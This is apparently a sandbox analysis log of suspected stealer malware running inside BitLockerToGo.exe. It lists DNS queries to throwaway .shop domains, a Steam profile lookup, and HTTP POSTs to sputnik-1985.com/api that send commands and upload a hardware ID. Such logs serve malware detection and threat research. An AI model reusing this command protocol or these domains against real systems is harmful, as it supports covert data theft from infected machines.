                                                                                                                                                                                                          Jan 7, 2025 06:02:02.028688908 CET49720443192.168.2.12104.21.112.1
                                                                                                                                                                                                          Jan 7, 2025 06:02:02.030031919 CET49720443192.168.2.12104.21.112.1
                                                                                                                                                                                                          Jan 7, 2025 06:02:02.030044079 CET44349720104.21.112.1192.168.2.12
                                                                                                                                                                                                          Jan 7, 2025 06:02:02.030291080 CET44349720104.21.112.1192.168.2.12
                                                                                                                                                                                                          Jan 7, 2025 06:02:02.031610012 CET49720443192.168.2.12104.21.112.1
                                                                                                                                                                                                          Jan 7, 2025 06:02:02.031717062 CET49720443192.168.2.12104.21.112.1
                                                                                                                                                                                                          Jan 7, 2025 06:02:02.031727076 CET44349720104.21.112.1192.168.2.12
                                                                                                                                                                                                          Jan 7, 2025 06:02:02.764039040 CET44349720104.21.112.1192.168.2.12
| Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS |
|---|---|---|---|---|---|---|---|---|
| Jan 7, 2025 06:01:53.176740885 CET | 192.168.2.12 | 1.1.1.1 | 0xfece | Standard query (0) | bootstringjl.click | A (IP address) | IN (0x0001) | false |
| Jan 7, 2025 06:01:53.190388918 CET | 192.168.2.12 | 1.1.1.1 | 0x82aa | Standard query (0) | nearycrepso.shop | A (IP address) | IN (0x0001) | false |
| Jan 7, 2025 06:01:53.201766014 CET | 192.168.2.12 | 1.1.1.1 | 0x5672 | Standard query (0) | abruptyopsn.shop | A (IP address) | IN (0x0001) | false |
| Jan 7, 2025 06:01:53.213433981 CET | 192.168.2.12 | 1.1.1.1 | 0xd625 | Standard query (0) | wholersorie.shop | A (IP address) | IN (0x0001) | false |
| Jan 7, 2025 06:01:53.224915981 CET | 192.168.2.12 | 1.1.1.1 | 0x6596 | Standard query (0) | framekgirus.shop | A (IP address) | IN (0x0001) | false |
| Jan 7, 2025 06:01:53.235107899 CET | 192.168.2.12 | 1.1.1.1 | 0x751e | Standard query (0) | tirepublicerj.shop | A (IP address) | IN (0x0001) | false |
| Jan 7, 2025 06:01:53.245728016 CET | 192.168.2.12 | 1.1.1.1 | 0xa94a | Standard query (0) | noisycuttej.shop | A (IP address) | IN (0x0001) | false |
| Jan 7, 2025 06:01:53.257266998 CET | 192.168.2.12 | 1.1.1.1 | 0x753d | Standard query (0) | rabidcowse.shop | A (IP address) | IN (0x0001) | false |
| Jan 7, 2025 06:01:53.268439054 CET | 192.168.2.12 | 1.1.1.1 | 0xed76 | Standard query (0) | cloudewahsj.shop | A (IP address) | IN (0x0001) | false |
| Jan 7, 2025 06:01:53.278709888 CET | 192.168.2.12 | 1.1.1.1 | 0xae93 | Standard query (0) | steamcommunity.com | A (IP address) | IN (0x0001) | false |
| Jan 7, 2025 06:01:54.593055964 CET | 192.168.2.12 | 1.1.1.1 | 0xb149 | Standard query (0) | sputnik-1985.com | A (IP address) | IN (0x0001) | false |
| Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS |
|---|---|---|---|---|---|---|---|---|---|---|
| Jan 7, 2025 06:01:53.186064959 CET | 1.1.1.1 | 192.168.2.12 | 0xfece | Name error (3) | bootstringjl.click | none | none | A (IP address) | IN (0x0001) | false |
| Jan 7, 2025 06:01:53.198714018 CET | 1.1.1.1 | 192.168.2.12 | 0x82aa | Name error (3) | nearycrepso.shop | none | none | A (IP address) | IN (0x0001) | false |
| Jan 7, 2025 06:01:53.210448027 CET | 1.1.1.1 | 192.168.2.12 | 0x5672 | Name error (3) | abruptyopsn.shop | none | none | A (IP address) | IN (0x0001) | false |
| Jan 7, 2025 06:01:53.222105026 CET | 1.1.1.1 | 192.168.2.12 | 0xd625 | Name error (3) | wholersorie.shop | none | none | A (IP address) | IN (0x0001) | false |
| Jan 7, 2025 06:01:53.233690023 CET | 1.1.1.1 | 192.168.2.12 | 0x6596 | Name error (3) | framekgirus.shop | none | none | A (IP address) | IN (0x0001) | false |
| Jan 7, 2025 06:01:53.243957043 CET | 1.1.1.1 | 192.168.2.12 | 0x751e | Name error (3) | tirepublicerj.shop | none | none | A (IP address) | IN (0x0001) | false |
| Jan 7, 2025 06:01:53.254334927 CET | 1.1.1.1 | 192.168.2.12 | 0xa94a | Name error (3) | noisycuttej.shop | none | none | A (IP address) | IN (0x0001) | false |
| Jan 7, 2025 06:01:53.265564919 CET | 1.1.1.1 | 192.168.2.12 | 0x753d | Name error (3) | rabidcowse.shop | none | none | A (IP address) | IN (0x0001) | false |
| Jan 7, 2025 06:01:53.277069092 CET | 1.1.1.1 | 192.168.2.12 | 0xed76 | Name error (3) | cloudewahsj.shop | none | none | A (IP address) | IN (0x0001) | false |
| Jan 7, 2025 06:01:53.286320925 CET | 1.1.1.1 | 192.168.2.12 | 0xae93 | No error (0) | steamcommunity.com | | 104.102.49.254 | A (IP address) | IN (0x0001) | false |
| Jan 7, 2025 06:01:54.625891924 CET | 1.1.1.1 | 192.168.2.12 | 0xb149 | No error (0) | sputnik-1985.com | | 104.21.112.1 | A (IP address) | IN (0x0001) | false |
| Jan 7, 2025 06:01:54.625891924 CET | 1.1.1.1 | 192.168.2.12 | 0xb149 | No error (0) | sputnik-1985.com | | 104.21.80.1 | A (IP address) | IN (0x0001) | false |
| Jan 7, 2025 06:01:54.625891924 CET | 1.1.1.1 | 192.168.2.12 | 0xb149 | No error (0) | sputnik-1985.com | | 104.21.96.1 | A (IP address) | IN (0x0001) | false |
| Jan 7, 2025 06:01:54.625891924 CET | 1.1.1.1 | 192.168.2.12 | 0xb149 | No error (0) | sputnik-1985.com | | 104.21.64.1 | A (IP address) | IN (0x0001) | false |
| Jan 7, 2025 06:01:54.625891924 CET | 1.1.1.1 | 192.168.2.12 | 0xb149 | No error (0) | sputnik-1985.com | | 104.21.16.1 | A (IP address) | IN (0x0001) | false |
| Jan 7, 2025 06:01:54.625891924 CET | 1.1.1.1 | 192.168.2.12 | 0xb149 | No error (0) | sputnik-1985.com | | 104.21.32.1 | A (IP address) | IN (0x0001) | false |
| Jan 7, 2025 06:01:54.625891924 CET | 1.1.1.1 | 192.168.2.12 | 0xb149 | No error (0) | sputnik-1985.com | | 104.21.48.1 | A (IP address) | IN (0x0001) | false |
• steamcommunity.com
• sputnik-1985.com

| Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
|---|---|---|---|---|---|---|
| 0 | 192.168.2.12 | 49714 | 104.102.49.254 | 443 | 6484 | C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe |
Timestamp, Bytes transferred, Direction, Data:

2025-01-07 05:01:54 UTC, 219 bytes, OUT:
GET /profiles/76561199724331900 HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Host: steamcommunity.com

2025-01-07 05:01:54 UTC, 1905 bytes, IN:
HTTP/1.1 200 OK
Server: nginx
Content-Type: text/html; charset=UTF-8
Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED]
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache
Date: Tue, 07 Jan 2025 05:01:54 GMT
Content-Length: 35126
Connection: close
Set-Cookie: sessionid=16b2a9677645a01502d421c0; Path=/; Secure; SameSite=None
Set-Cookie: steamCountry=US%7C185ce35c568ebbb18a145d0cabae7186; Path=/; Secure; HttpOnly; SameSite=None

2025-01-07 05:01:54 UTC, 14479 bytes, IN:
Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><title>

2025-01-07 05:01:54 UTC, 16384 bytes, IN:
Data Ascii: ity.com/?subsection=broadcasts">Broadcasts</a></div><a class="menuitem " href="https://store.steampowered.com/about/">About</a><a class="menuitem " href="https://help.steampowered.com/en/">SUPPO

2025-01-07 05:01:54 UTC, 3768 bytes, IN:
                                                                                                                                                                                                          Data Ascii: </a></div><div class="profile_header_actions"></div></div><div class="profile_header_summary"><div class="persona_name persona_name_spacer" style="font-size: 24px;"><span class="actual_persona_
                                                                                                                                                                                                          2025-01-07 05:01:54 UTC495INData Raw: 63 72 69 62 65 72 20 41 67 72 65 65 6d 65 6e 74 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 26 6e 62 73 70 3b 7c 20 26 6e 62 73 70 3b 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 73 74 6f 72 65 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 61 63 63 6f 75 6e 74 2f 63 6f 6f 6b 69 65 70 72 65 66 65 72 65 6e 63 65 73 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 43 6f 6f 6b 69 65 73 3c 2f 61 3e 0a 09 09 09 09 09 09 3c 2f 73 70 61 6e 3e 0a 09 09 09 09 09 09 09 09 09 3c 2f 73 70 61 6e 3e 0a 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 72 65 73 70 6f 6e 73 69 76 65 5f 6f 70 74 69 6e 5f 6c 69 6e 6b 22 3e 0a 09 09 09 09 3c 64 69 76 20 63 6c 61 73
                                                                                                                                                                                                          Data Ascii: criber Agreement</a> &nbsp;| &nbsp;<a href="http://store.steampowered.com/account/cookiepreferences/" target="_blank">Cookies</a></span></span></div><div class="responsive_optin_link"><div clas


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.12 | 49715 | 104.21.112.1 | 443 | 6484 | C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Timestamp | Bytes transferred | Direction | Data
2025-01-07 05:01:55 UTC | 263 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 8
Host: sputnik-1985.com
2025-01-07 05:01:55 UTC | 8 | OUT | Data Raw: 61 63 74 3d 6c 69 66 65
Data Ascii: act=life
2025-01-07 05:01:55 UTC | 1127 | IN | HTTP/1.1 200 OK
Date: Tue, 07 Jan 2025 05:01:55 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=jmttgq25f5i0gqv4lrlk1f8r4f; expires=Fri, 02 May 2025 22:48:34 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JAFrIjA%2BxZGtT9WNCWdcIg4WS9bDe3lBbA2qXAHAcG95fCv0%2Bq0PeBbDJKCb2Yq5zS5rj%2FMykrgj7Pi2XwkRjdMGU%2FHlWz2K%2BncvnofnemL%2BmZOH7hGQgf8ZPuoHtUqPLJjY"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8fe16484b988424b-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1592&min_rtt=1583&rtt_var=612&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2840&recv_bytes=907&delivery_rate=1761158&cwnd=248&unsent_bytes=0&cid=11c546eca294e121&ts=594&x=0"
2025-01-07 05:01:55 UTC | 7 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a
Data Ascii: 2ok
2025-01-07 05:01:55 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.12 | 49716 | 104.21.112.1 | 443 | 6484 | C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Timestamp | Bytes transferred | Direction | Data
2025-01-07 05:01:56 UTC | 264 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 86
Host: sputnik-1985.com
2025-01-07 05:01:56 UTC | 86 | OUT | Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 48 70 4f 6f 49 68 2d 2d 32 61 37 32 37 61 30 33 32 63 34 64 26 6a 3d 62 39 61 62 63 37 36 63 65 35 33 62 36 66 63 33 61 30 33 35 36 36 66 38 66 37 36 34 66 35 65 61
Data Ascii: act=recive_message&ver=4.0&lid=HpOoIh--2a727a032c4d&j=b9abc76ce53b6fc3a03566f8f764f5ea
2025-01-07 05:01:56 UTC | 1125 | IN | HTTP/1.1 200 OK
Date: Tue, 07 Jan 2025 05:01:56 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=hkks3fa9toggj8a2e70v4jnkfh; expires=Fri, 02 May 2025 22:48:35 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2M8biXwUHipSYSLbpdQ267hq0ZK%2F4iKH8mVLjZMLi%2FoyIFh5%2FT%2Fg40VkOD8faSRnRGj9EyQWV0R6AoPotlKx2x2IySqj4%2F2gIrCpW74ZnwjJN6XEm2hWU9nhVyPlba9ZNoNf"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8fe1648a9ed8727b-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1931&min_rtt=1930&rtt_var=726&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2840&recv_bytes=986&delivery_rate=1505154&cwnd=234&unsent_bytes=0&cid=5e02e887371c0f2b&ts=484&x=0"
                                                                                                                                                                                                          2025-01-07 05:01:56 UTC244INData Raw: 34 36 62 0d 0a 75 50 2b 57 66 6c 74 30 45 65 32 6e 63 34 33 61 4f 41 5a 58 72 54 4f 75 35 54 42 33 2b 41 7a 6f 65 59 53 46 76 76 6b 71 53 45 62 44 33 65 42 63 59 55 41 39 7a 39 51 57 72 2b 42 65 5a 7a 76 65 56 6f 4c 48 55 52 50 61 4e 6f 34 59 36 50 62 62 31 51 67 2b 4b 35 72 46 38 42 38 33 42 33 54 42 68 52 62 31 2b 41 4a 64 4c 49 39 57 77 4d 63 4b 56 5a 31 6d 69 68 6a 6f 35 39 2b 53 52 54 67 71 32 35 66 36 47 54 4d 52 63 6f 6e 47 48 2b 43 2f 58 57 4d 32 78 31 33 48 69 46 67 61 32 69 44 4b 48 50 36 6e 68 4e 74 6e 4c 54 4c 5a 73 76 63 4e 4d 46 5a 73 77 64 78 52 36 4c 51 61 50 48 58 4d 56 73 79 4a 56 68 4f 54 5a 49 41 52 34 4f 62 61 6b 31 6f 68 49 4e 43 58 39 42 6f 79 47 33 75 64 79 78 58 6e 74 46 74 70 4e 6f 38 66 6a 49 42
                                                                                                                                                                                                          Data Ascii: 46buP+Wflt0Ee2nc43aOAZXrTOu5TB3+AzoeYSFvvkqSEbD3eBcYUA9z9QWr+BeZzveVoLHURPaNo4Y6Pbb1Qg+K5rF8B83B3TBhRb1+AJdLI9WwMcKVZ1mihjo59+SRTgq25f6GTMRconGH+C/XWM2x13HiFga2iDKHP6nhNtnLTLZsvcNMFZswdxR6LQaPHXMVsyJVhOTZIAR4Obak1ohINCX9BoyG3udyxXntFtpNo8fjIB
                                                                                                                                                                                                          2025-01-07 05:01:56 UTC894INData Raw: 4b 56 63 49 75 32 53 6e 6c 39 73 32 4f 52 54 6f 69 6d 6f 4b 36 42 58 6b 52 66 38 2b 64 55 65 65 30 56 47 45 32 77 46 62 4e 68 30 41 61 6d 6d 32 43 45 2b 4c 74 30 35 52 48 4a 43 37 64 6c 66 30 62 4e 68 46 37 69 63 6f 53 72 2f 59 61 59 79 32 50 43 59 79 6e 51 68 61 5a 65 6f 63 4b 70 76 69 53 67 67 67 74 4b 4a 72 46 74 42 6f 33 46 33 36 50 31 78 6e 6b 73 31 39 32 50 73 5a 63 77 59 64 66 48 35 56 74 69 68 7a 73 37 64 4f 52 54 43 63 70 33 4a 33 30 58 48 64 57 64 4a 65 46 53 61 2b 62 58 33 51 79 77 30 65 4f 76 52 49 4b 31 48 66 4b 48 4f 71 6e 68 4e 74 41 4c 79 66 5a 6c 76 73 66 4d 52 31 68 6a 39 63 58 34 72 31 49 59 6a 44 42 57 38 2b 56 57 42 75 63 62 59 4d 51 37 2b 4c 62 6e 77 68 6b 5a 4e 32 46 74 45 52 35 4e 33 36 45 79 52 76 34 75 42 70 37 65 39 59 52 79 34
                                                                                                                                                                                                          Data Ascii: KVcIu2Snl9s2ORToimoK6BXkRf8+dUee0VGE2wFbNh0Aamm2CE+Lt05RHJC7dlf0bNhF7icoSr/YaYy2PCYynQhaZeocKpviSgggtKJrFtBo3F36P1xnks192PsZcwYdfH5Vtihzs7dORTCcp3J30XHdWdJeFSa+bX3Qyw0eOvRIK1HfKHOqnhNtALyfZlvsfMR1hj9cX4r1IYjDBW8+VWBucbYMQ7+LbnwhkZN2FtER5N36EyRv4uBp7e9YRy4
                                                                                                                                                                                                          2025-01-07 05:01:56 UTC1369INData Raw: 33 65 61 31 0d 0a 53 77 6f 6c 56 41 39 70 78 78 41 4b 6d 34 4e 44 62 45 47 6f 71 31 35 62 34 47 7a 41 58 63 49 2f 50 48 2b 43 79 55 6d 77 31 77 6c 44 48 6a 31 51 59 6b 57 47 46 48 4f 37 6b 30 4a 35 46 4b 57 53 55 33 66 4d 45 65 55 34 7a 71 73 73 53 2f 71 6b 59 55 54 62 42 58 38 75 52 45 67 72 55 64 38 6f 63 36 71 65 45 32 30 49 74 49 39 36 51 2f 68 38 39 45 6e 36 41 7a 42 6a 6d 71 6c 42 6f 4f 39 31 63 78 6f 4a 63 47 5a 39 68 69 68 72 6e 36 64 61 51 43 47 52 6b 33 59 57 30 52 48 6b 35 66 70 2f 58 47 2b 53 70 47 46 45 32 77 56 2f 4c 6b 52 49 4b 31 48 66 4b 48 4f 71 6e 68 4e 74 44 4c 43 6a 57 6e 66 49 4f 4e 78 6c 68 68 64 63 56 34 62 78 57 61 6a 7a 43 58 73 6d 56 56 68 57 49 62 34 38 63 36 4f 72 4f 6e 67 68 6b 5a 4e 32 46 74 45 52 35 4c 45 65 49 31 51 44 6f
                                                                                                                                                                                                          Data Ascii: 3ea1SwolVA9pxxAKm4NDbEGoq15b4GzAXcI/PH+CyUmw1wlDHj1QYkWGFHO7k0J5FKWSU3fMEeU4zqssS/qkYUTbBX8uREgrUd8oc6qeE20ItI96Q/h89En6AzBjmqlBoO91cxoJcGZ9hihrn6daQCGRk3YW0RHk5fp/XG+SpGFE2wV/LkRIK1HfKHOqnhNtDLCjWnfIONxlhhdcV4bxWajzCXsmVVhWIb48c6OrOnghkZN2FtER5LEeI1QDo
                                                                                                                                                                                                          2025-01-07 05:01:56 UTC1369INData Raw: 58 4d 51 4d 76 48 48 46 57 55 61 49 70 62 76 76 48 4d 6a 45 38 31 61 73 50 64 38 78 42 35 54 6a 4f 46 31 78 54 68 76 46 42 68 4d 63 4e 62 7a 49 4a 41 48 5a 78 70 68 68 50 6a 36 4e 71 65 52 53 30 76 32 59 2f 6d 48 7a 30 59 66 38 2b 4c 55 65 69 67 47 6a 78 31 36 6b 62 50 6c 31 51 57 32 6e 48 45 41 71 62 67 30 4e 73 51 61 69 54 55 6b 66 38 62 4d 68 31 33 69 38 55 63 35 4c 5a 55 62 54 6e 48 58 63 75 56 58 78 43 53 5a 49 4d 65 36 75 72 66 69 55 73 72 5a 4a 54 64 38 77 52 35 54 6a 4f 6f 39 69 62 4d 2b 45 55 71 4c 49 39 57 77 4d 63 4b 56 5a 74 6d 6a 52 58 69 39 64 4b 4a 52 69 30 6b 33 4a 58 38 47 7a 55 59 66 5a 33 4e 45 4f 2b 32 56 57 77 38 79 31 44 49 67 31 34 53 32 69 44 4b 48 50 36 6e 68 4e 74 67 4b 54 37 41 33 39 6f 58 4f 52 46 6a 6d 64 35 52 38 50 5a 44 4a
                                                                                                                                                                                                          Data Ascii: XMQMvHHFWUaIpbvvHMjE81asPd8xB5TjOF1xThvFBhMcNbzIJAHZxphhPj6NqeRS0v2Y/mHz0Yf8+LUeigGjx16kbPl1QW2nHEAqbg0NsQaiTUkf8bMh13i8Uc5LZUbTnHXcuVXxCSZIMe6urfiUsrZJTd8wR5TjOo9ibM+EUqLI9WwMcKVZtmjRXi9dKJRi0k3JX8GzUYfZ3NEO+2VWw8y1DIg14S2iDKHP6nhNtgKT7A39oXORFjmd5R8PZDJ
                                                                                                                                                                                                          2025-01-07 05:01:56 UTC1369INData Raw: 54 79 55 74 56 6e 57 4c 4b 51 36 62 71 7a 70 70 4e 4f 43 44 56 6c 75 59 58 50 78 5a 32 6e 63 49 64 35 62 64 5a 62 44 6a 4d 57 64 36 48 58 78 57 49 66 49 77 51 36 4b 65 53 32 30 38 79 5a 49 4c 64 78 51 73 79 56 6d 7a 42 33 46 48 6f 74 42 6f 38 64 63 78 62 77 59 6c 41 45 5a 78 6c 69 52 58 75 34 74 53 66 51 69 63 72 30 5a 66 39 46 44 6b 5a 64 6f 66 4f 46 2b 47 35 58 47 67 34 6a 78 2b 4d 67 45 70 56 77 69 36 74 41 65 76 68 79 34 70 39 4c 53 53 4c 33 65 74 53 49 46 5a 30 67 34 56 4a 72 37 56 57 62 6a 6a 4b 56 63 53 41 55 52 53 57 61 6f 63 57 34 75 37 59 6e 6c 6f 34 49 74 53 64 2b 78 49 32 47 6d 47 42 77 42 48 6a 2b 42 51 6b 4d 74 63 52 6c 4d 64 6a 41 70 6f 75 6c 56 58 2f 70 39 75 58 43 48 4a 6b 31 5a 44 6d 45 44 59 57 63 6f 7a 42 47 75 69 2b 58 47 55 32 79 6c
                                                                                                                                                                                                          Data Ascii: TyUtVnWLKQ6bqzppNOCDVluYXPxZ2ncId5bdZbDjMWd6HXxWIfIwQ6KeS208yZILdxQsyVmzB3FHotBo8dcxbwYlAEZxliRXu4tSfQicr0Zf9FDkZdofOF+G5XGg4jx+MgEpVwi6tAevhy4p9LSSL3etSIFZ0g4VJr7VWbjjKVcSAURSWaocW4u7Ynlo4ItSd+xI2GmGBwBHj+BQkMtcRlMdjApoulVX/p9uXCHJk1ZDmEDYWcozBGui+XGU2yl
                                                                                                                                                                                                          2025-01-07 05:01:56 UTC1369INData Raw: 56 63 49 75 67 52 50 70 39 64 6d 53 51 43 34 74 32 70 6e 2b 45 54 34 57 64 6f 4c 41 46 65 47 38 58 57 51 35 77 46 62 45 69 46 59 56 6c 53 37 45 57 2b 48 2f 6e 4d 4d 49 43 69 2f 4d 76 50 6f 58 4b 31 5a 73 77 64 78 52 36 4c 51 61 50 48 58 42 57 4d 32 50 58 42 6d 53 61 70 67 62 37 65 37 54 6d 6b 63 71 4a 39 75 58 2f 41 34 2f 46 6e 69 48 77 68 6e 72 74 6b 68 6c 4f 6f 38 66 6a 49 42 4b 56 63 49 75 75 77 33 68 34 4e 50 5a 59 53 30 2f 32 35 66 33 46 7a 56 57 62 4d 48 63 55 65 69 30 47 6a 78 31 77 6c 33 42 67 30 41 5a 6d 6d 36 44 48 4f 7a 31 30 35 52 46 4b 53 54 66 6a 2f 55 4f 4e 68 31 32 6a 4d 45 65 34 4c 52 53 62 6e 57 42 45 63 75 66 45 6b 33 61 51 6f 6b 4b 37 4b 58 37 67 56 34 74 4b 4d 75 57 2b 52 42 35 43 54 32 57 68 52 62 6a 2b 41 49 6b 4e 63 35 63 33 6f 4a
                                                                                                                                                                                                          Data Ascii: VcIugRPp9dmSQC4t2pn+ET4WdoLAFeG8XWQ5wFbEiFYVlS7EW+H/nMMICi/MvPoXK1ZswdxR6LQaPHXBWM2PXBmSapgb7e7TmkcqJ9uX/A4/FniHwhnrtkhlOo8fjIBKVcIuuw3h4NPZYS0/25f3FzVWbMHcUei0Gjx1wl3Bg0AZmm6DHOz105RFKSTfj/UONh12jMEe4LRSbnWBEcufEk3aQokK7KX7gV4tKMuW+RB5CT2WhRbj+AIkNc5c3oJ


Session ID: 3
Source IP: 192.168.2.12
Source Port: 49717
Destination IP: 104.21.112.14
Destination Port: 443
PID: 6484
Process: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Timestamp: 2025-01-07 05:01:57 UTC | Bytes transferred: 282 | Direction: OUT
Data:
POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=U8EC1VY5VE892AI389
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 12844
Host: sputnik-1985.com

Timestamp: 2025-01-07 05:01:57 UTC | Bytes transferred: 12844 | Direction: OUT
Data Ascii (decoded from the truncated raw hex dump):
--U8EC1VY5VE892AI389
Content-Disposition: form-data; name="hwid"

8A6CA42990BFD5D420A4C476FD51BCB1
--U8EC1VY5VE892AI389
Content-Disposition: form-data; name="pid"

2
--U8EC1VY5VE892AI389
Content-Disposition: form-data; name="lid"

HpOoIh--2a727

Timestamp: 2025-01-07 05:01:58 UTC | Bytes transferred: 1128 | Direction: IN
Data:
HTTP/1.1 200 OK
Date: Tue, 07 Jan 2025 05:01:58 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=7uasdpsb7fsv8gf2ak9qhk9al6; expires=Fri, 02 May 2025 22:48:36 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=f%2FOPiCAWNKtChG80MZUnAIfAYr9CHkFfy%2BKgehzRSNvVcsiWW2jFHBNKaaCw5NjKAxGUbfBkapWVPYHZGo2MqxD%2BtVZTYkZvx5a%2FxgcmYSCCtF99O2jr%2F9tl2C6ZMQncwol8"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8fe16492cdc3727b-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1901&min_rtt=1897&rtt_var=720&sent=9&recv=18&lost=0&retrans=0&sent_bytes=2839&recv_bytes=13784&delivery_rate=1511387&cwnd=234&unsent_bytes=0&cid=fd4dc95d4a855ab6&ts=580&x=0"

Timestamp: 2025-01-07 05:01:58 UTC | Bytes transferred: 20 | Direction: IN
Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
Data Ascii:
f
ok 8.46.123.189

Timestamp: 2025-01-07 05:01:58 UTC | Bytes transferred: 5 | Direction: IN
Data Raw: 30 0d 0a 0d 0a
Data Ascii:
0


Session ID: 4
Source IP: 192.168.2.12
Source Port: 49718
Destination IP: 104.21.112.14
Destination Port: 443
PID: 6484
Process: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Timestamp: 2025-01-07 05:01:58 UTC | Bytes transferred: 281 | Direction: OUT
Data:
POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=NR6WZU599JG4CJFS1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 15073
Host: sputnik-1985.com

Timestamp: 2025-01-07 05:01:58 UTC | Bytes transferred: 15073 | Direction: OUT
Data Ascii (decoded from the truncated raw hex dump):
--NR6WZU599JG4CJFS1
Content-Disposition: form-data; name="hwid"

8A6CA42990BFD5D420A4C476FD51BCB1
--NR6WZU599JG4CJFS1
